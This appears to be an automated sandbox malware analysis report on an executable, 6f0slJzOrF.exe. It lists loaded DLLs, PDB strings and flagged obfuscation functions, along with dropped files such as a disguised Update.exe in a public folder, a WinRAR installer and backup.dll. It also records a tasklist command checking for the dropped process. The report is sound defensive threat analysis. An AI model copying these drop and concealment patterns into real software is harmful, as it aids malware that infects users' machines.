    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: update.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: dinput8.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: devenum.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msdmo.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: avicap32.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: msvfw32.dllJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
    Source: winrar-x64-700scp.exe.lnk.3.drLNK file: ..\..\Public\Bilite\winrar-x64-700scp.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: 6f0slJzOrF.exeStatic file information: File size 73598737 > 1048576
    Source: Binary string: \YSS\Release\Update.pdb source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmp, Update.exe, 00000003.00000003.2480482624.00000000015C3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \YSS\Release\Update.pdb0 source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmp, Update.exe, 00000003.00000003.2480482624.00000000015C3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar-x64-700scp.exe.0.dr
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2615239555.0000000006D2F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1778858106.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3548624115.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo source: powershell.exe, 00000012.00000002.2621611408.0000000007D97000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb50r source: powershell.exe, 00000012.00000002.2615239555.0000000006D2F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2621611408.0000000007D97000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLIST,, source: powershell.exe, 00000012.00000002.2614200432.0000000006C97000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: 6f0slJzOrF.exe, 00000000.00000003.1774772328.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1778858106.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3548624115.0000000000222000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb3w source: powershell.exe, 00000012.00000002.2621611408.0000000007D90000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64-700scp.exe.0.dr
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb( source: powershell.exe, 00000012.00000002.2594552418.0000000000461000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\Public\Bilite\Axialis\Update.exeUnpacked PE file: 3.2.Update.exe.4320000.6.unpack
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
    Source: Update.dll.0.drStatic PE information: section name: .00cfg
    Source: winrar-x64-700scp.exe.0.drStatic PE information: section name: .didat
    Source: winrar-x64-700scp.exe.0.drStatic PE information: section name: _RDATA
    Source: backup.dll.3.drStatic PE information: section name: .00cfg
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00411C20 push eax; ret 0_2_00411C4E
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04342470 push ebp; retf 3_2_04342474
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04342450 push ebp; retf 3_2_04342474
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04334345 push ecx; ret 3_2_04334358
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1E8AB3 push ecx; ret 3_2_6C1E8AC6
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C2AA779 push ecx; ret 3_2_6C2AA78E
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10009DF5 push ecx; ret 3_2_10009E08
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1001FE9A push ecx; ret 3_2_1001FEBF
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0328CB0B push 701000CBh; retf 3_2_0328CB10
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0328CB07 pushad ; retf 3_2_0328CB08
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0328CB61 pushfd ; retf 3_2_0328CB64
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0328CAFF push eax; retf 3_2_0328CB00
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03289DCC push ecx; ret 3_2_03289DDF
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041B3D04 push ecx; ret 3_2_041B3D17
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\backup.exeJump to dropped file
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeFile created: C:\Users\Public\Bilite\Axialis\Update.dllJump to dropped file
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeFile created: C:\Users\Public\Bilite\winrar-x64-700scp.exeJump to dropped file
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeFile created: C:\Users\Public\Bilite\Axialis\Update.exeJump to dropped file
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1EC42D GetParent,IsIconic,GetParent,__EH_prolog3,3_2_6C1EC42D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1DC528 IsWindowVisible,IsIconic,3_2_6C1DC528
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1D0523 IsIconic,IsWindowVisible,3_2_6C1D0523
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25E028 IsWindowVisible,ScreenToClient,IsIconic,GetSystemMetrics,PtInRect,PtInRect,GetSystemMetrics,PtInRect,3_2_6C25E028
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25C1C2 IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,3_2_6C25C1C2
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25E231 IsIconic,PostMessageW,3_2_6C25E231
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25BEF7 GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,3_2_6C25BEF7
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25DF0D IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,3_2_6C25DF0D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25DF0D IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,3_2_6C25DF0D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C25DF0D IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,3_2_6C25DF0D
